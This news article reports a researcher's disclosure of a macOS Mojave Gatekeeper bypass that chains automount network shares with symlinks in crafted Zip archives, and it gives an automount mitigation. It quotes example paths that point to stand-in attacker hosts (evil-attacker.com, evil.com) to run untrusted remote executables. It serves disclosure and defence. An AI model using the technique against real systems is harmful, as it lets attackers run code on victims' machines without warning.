Gatekeeper Bug in MacOS Mojave Allows Malware to Execute

gatekeeper macOS

Researcher discloses vulnerability in macOS Gatekeeper security feature that allows the execution of malicious code on current version of the OS.

Researcher Filippo Cavallarin disclosed a bug in the macOS security feature Gatekeeper that allows malicious code execution on systems running the most recent version of Mojave (10.14.0).

MacOS Gatekeeper is an Apple security feature that enforces code signing and verifies downloads and apps before users run them. The goal is to eliminate the possibility of malicious files being executed on systems. Gatekeeper requires the user’s consent before opening a file.

“On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user’s explicit permission,” wrote Cavallarin, the CEO of Segment, an Italian security firm.

While there is no patch from Apple, at this time, a workaround to mitigate the vulnerability is available.

The researcher said he notified Apple of the flaw on February 22. Since then, Apple as not issued a patch, the researcher noted. “This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public,” he wrote.

The flaw is tied to Apple Gatekeeper’s support of external drives and network shares. Both are viewed as safe locations that allow any applications contained in them to run, according to Cavallarin. In a proof-of-concept attack the researcher was able to couple this with a second feature “automount” to create an attack scenario.

“The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just by accessing a ‘special’ path, in this case, any path beginning with ‘/net/’.  For example ls /net/evil-attacker.com/sharedfolder/ will make the OS read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS,” Cavallarin describes.

Next, the researcher points out that a Zip archive can contain “symbolic links pointing to an arbitrary location (including automount endpoints) and that the software on macOS that is responsible to decompress Zip files do not perform any check on the symlinks before creating them.”

Symlinks, also known as Symbolic links, are macOS files that point to (or can be crafted to point to) files or directories in other locations on your system.

The author posted a video demonstration of the vulnerability.

The attack involves the adversary to create a specially crafted Zip archive that combines a “symbolic” link to an automount endpoint that the attacker controls. The malicious link path sent to the victim, for example, might follow the convention “ex Documents -> /net/evil.com/Documents.”

“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot,” Cavallarin wrote.

Mitigation against these attacks is fairly simple and includes a three-step process that involves disabling automount.

  1. “Edit /etc/auto_master as root
  2. Comment the line beginning with ‘/net’
  3. Reboot

Want to know more about Identity Management and navigating the shift beyond passwords? Don’t miss our Threatpost webinar on May 29 at 2 p.m. ET. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow.

Suggested articles